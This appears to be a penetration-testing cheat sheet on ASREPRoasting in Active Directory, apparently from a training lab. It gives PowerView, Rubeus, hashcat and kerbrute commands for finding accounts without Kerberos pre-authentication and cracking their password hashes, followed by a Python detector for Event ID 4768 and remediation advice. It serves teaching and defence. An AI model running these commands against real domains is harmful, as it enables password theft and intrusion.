ASREPRoasting
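ASREPRoasting is an attack that exploits user accounts in Active Directory that have Kerberos pre-authentication disabled. Because the KDC answers an authentication request for such an account without proof of the password, an attacker can retrieve the AS-REP that accompanies the Ticket Granting Ticket (TGT). Part of that response is encrypted with a key derived from the user's password and can be cracked offline to obtain the plaintext password.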
1. Enumerate Users with Pre-Authentication Not Required
Command:
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
Description: Uses PowerView to search for user accounts in a target Windows domain that have the DONT_REQ_PREAUTH flag set in userAccountControl. Performed from a Windows-based host.
2. Perform ASREPRoasting Attack with Rubeus
Command:
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
Description: Uses Rubeus to perform an ASREPRoasting attack and formats the output for Hashcat. Performed from a Windows-based host.
3. Crack Captured Hash with Hashcat
Command:
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt
Description: Uses Hashcat to attempt to crack the captured ASREP hash using a wordlist (rockyou.txt). Performed from a Linux-based host.
4. Enumerate Users and Retrieve ASREP Hashes with Kerbrute
Command:
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
Description: Enumerates users in a target Windows domain and automatically retrieves ASREP hashes for any users that do not require Kerberos pre-authentication. Performed from a Linux-based host.
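Detection side of the steps above, as an added example that is not part of the original page: a Python check that scans exported domain controller Security events for Event ID 4768 (TGT request) records logged with Pre-Authentication Type 0, which is how a request for a DONT_REQ_PREAUTH account appears. The sample events, the source address 172.16.5.130, the accounts other than mmorgan and the severity thresholds are constructed assumptions.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the AS-REP type that hashcat mode 18200 handles

# Constructed 4768/4769 records; field names follow the Windows event schema,
# the source address and the accounts other than mmorgan are made up.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "mmorgan", "IpAddress": "::ffff:172.16.5.130",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "::ffff:172.16.5.130",
     "PreAuthType": "0", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "jsmith", "IpAddress": "::ffff:172.16.5.130",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "nobody", "IpAddress": "::ffff:172.16.5.130",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x6"},
    {"EventID": 4769, "TargetUserName": "jsmith", "IpAddress": "::ffff:172.16.5.130",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
]

def no_preauth_requests(events):
    """Group successful TGT requests made without pre-authentication by source IP."""
    by_source = defaultdict(list)
    for ev in events:
        if ev.get("EventID") != 4768:              # only AS (TGT) requests
            continue
        if int(ev.get("Status", "0x0"), 16) != 0:  # KDC returned an error, no AS-REP issued
            continue
        if ev.get("PreAuthType") != "0":           # 0 = logon without pre-authentication
            continue
        ip = ev.get("IpAddress", "").replace("::ffff:", "", 1)  # strip IPv4-mapped prefix
        rc4 = int(ev["TicketEncryptionType"], 16) == RC4_HMAC
        by_source[ip].append((ev["TargetUserName"], rc4))
    return dict(by_source)

def report(events, burst=2):
    """Return (source, users, severity); 'burst' is an assumed threshold, tune per site."""
    rows = []
    for ip, reqs in sorted(no_preauth_requests(events).items()):
        users = sorted({user for user, _ in reqs})
        if len(users) >= burst:                    # one host requesting several such accounts
            severity = "high"
        elif any(rc4 for _, rc4 in reqs):          # RC4 reply is the cheapest to crack offline
            severity = "medium"
        else:
            severity = "low"
        rows.append((ip, users, severity))
    return rows
```

Accounts that legitimately have pre-authentication disabled also log type 0 on normal logons, so each row is a candidate to review; every account it names should have pre-authentication re-enabled or a long random password.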